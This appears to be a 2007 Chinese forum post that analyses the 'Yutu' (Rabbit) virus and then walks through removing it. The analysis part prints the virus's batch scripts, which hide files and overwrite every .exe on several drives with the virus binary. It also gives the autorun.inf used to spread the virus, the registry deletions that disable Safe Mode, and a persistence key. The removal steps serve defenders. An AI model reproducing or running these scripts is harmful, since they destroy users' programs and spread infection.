|
|
发表于 2007-5-19 18:57:29
|
显示全部楼层
玉兔病毒档案:
玉兔病毒会试图破坏安全模式,使用户无法进入该模式杀毒。玉兔病毒在每个盘符生成病毒文件和Autorun.inf文件,只要双击盘符就可以进行感染。玉兔病毒会结束安全软件及其他一些常用的安全辅助工具。玉兔病毒还修改注册表导致用户无法正常查看隐藏的系统文件,从而达到不被查杀的目的。
玉兔病毒病毒文件:
感染玉兔病毒之后,它会产生以下病毒文件(包括病毒文件名和路径):
C:\WINDOWS\system32\JK.exe
C:\WINDOWS\system32\love.bat
C:\WINDOWS\system32\loveRabbit.bat
C:\WINDOWS\system32\loveRabbit.exe
C:\WINDOWS\system32\msexch400.dll
C:\WINDOWS\system32\Rabbit.exe
C:\WINDOWS\msconfig.inf
C:\WINDOWS\msconfig1.inf
另外还可以在每个分区根目录下产生autorun.inf和Rabbit.exe(病毒文件)。
在进程管理器里有两个进程互相监视且不断调用cmd.exe (用以执行C:\WINDOWS\system32\love.bat和C:\WINDOWS\system32\loveRabbit.bat的内容)和attrib.exe;
loveRabbit.bat内容(不是原文件,里面有笔者加上的注释)如下:
=========================================
attrib +s +h C:\WINDOWS\system32\msexch400.dll
attrib +s +h c:\Rabbit.exe
attrib +s +h d:\Rabbit.exe
attrib +s +h e:\Rabbit.exe
attrib +s +h f:\Rabbit.exe
attrib +s +h g:\Rabbit.exe
attrib +s +h h:\Rabbit.exe
attrib +s +h c:\AutoRun.inf
attrib +s +h d:\AutoRun.inf
attrib +s +h e:\AutoRun.inf
attrib +s +h f:\AutoRun.inf
attrib +s +h g:\AutoRun.inf
attrib +s +h h:\AutoRun.inf
rem 为 autorun.inf 和 Rabbit.exe文件增加系统和隐藏属性
=========================================
love.bat内容如下:
=========================================
FOR %%a in ( d: e: f: h: g: ) do dir /s /b %%a\*.exe>>c:\windows\msconfig.inf
rem 把d: e: f: g: h:的所有exe文件做一个列表放到c:\windows\msconfig.inf
cd C:\Program Files
dir *.exe /s /b >>c:\windows\msconfig1.inf
rem 把C:\Program Files所有exe文件做一个列表放到c:\windows\msconfig1.inf
FOR /f "delims=" %%i in (c:\windows\msconfig.inf) do copy /y "C:\WINDOWS\system32\Rabbit.exe" "%%i"
FOR /f "delims=" %%i in (c:\windows\msconfig1.inf) do copy /y "C:\WINDOWS\system32\Rabbit.exe" "%%i"
rem 用C:\WINDOWS\system32\Rabbit.exe 替换这些exe文件(病毒是替换的文件,而不是感染文件,所以杀毒软件连修复的机会都没有,这也是玉兔病毒厉害的地方)
=========================================
在每个分区下面都有一个Rabbit.exe和一个autorun.inf 文件:
autorun.inf 内容
=========================================
[autorun]
Label=本地磁盘
Shellexecute=Rabbit.exe
rem 达到双击运行之目的,右键增加 “自动播放”
=========================================
shellexecute的用法具体请参考:
AutoRun.inf @ 是病毒启动加载点还是美化系统的工具~~~之我论
注册表方面:
增加键:
HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{4bf41072-b2b1-21c1-b5c1-0305f4155515}\StubPath
指向C:\WINDOWS\system32\JK.exe
这个键是WINDOWS操作系统启动项。
删除键:
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
删除值:
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}\: "DiskDrive"
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}\: "DiskDrive"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}\: "DiskDrive"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}\: "DiskDrive"
通过改写这些注册表项和键值莱达到破坏安全模式的目的。
玉兔病毒生成的 msexch400.dll 插入系统的winlogon 进程,使得winlogon.exe的线程数增多,干扰正常的关机和注销,并且可以在 loveRabbit.exe 被结束时由winlogon.exe重新启动,注销或者关机;
清除玉兔病毒
要清除盘符里的病毒文件和Autorun.inf文件,以防止病毒继续扩散。因为病毒的原因,不能够正常进入注册表和使用冰刃检查系统。在这里我们可以使用超级巡警绿色版本(下载地址会在后面给出)。
运行超级巡警,进入“进程管理”选项,发现bryato.exe、severe.exe、loveRabbit.exe等3个可疑的病毒进程。其中bryato.exe是盗取QQ密码的木马,而另外两个是玉兔病毒的进程。这三个进程都插入了bryato.dll运行。
由于病毒进程具有关闭后马上重启动的特点,首先选中三个进程,然后右键单击三个进程选择“禁止进程创建”命令,接着右键单击三个进程选择“强制卸载标记模块”命令,这样便可暂时终止了这几个进程。
进入“启动管理→注册表”选项,很快发现了bryato.exe和severe.exe的非法启动项目,右键单击这两个启动项目选择“删除启动项”命令予以清除。
此时病毒还潜伏在系统深处,进入“进程管理”,根据文件创建和其他信息可以发现Winlogon.exe系统进程被插入了msexch400.dll这个病毒文件,记下文件位置,接着选中该文件后右键单击选择“强制卸载标记模块”命令终止病毒进程。同样在conime.exe进程发现被插入了bryato.dll,选中该文件后右键单击选择“强制卸载标记模块”命令终止病毒进程。
重新启动计算机,用 WINRAR,ACDSEE或者TOTALCOMMAND找到记下的病毒文件并删除。
再次重新启动计算机,进入注册表编辑器,进入HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL子项,将ChekedValue键值为由1改为0,就可以显示隐藏的文件了。
最后删除导致无法双击打开盘符的Autorun.inf文件以及相关的OSO.exe即可。 |
|
闽公网安备35020302032614号 )
IP卡
狗仔卡
提升卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡
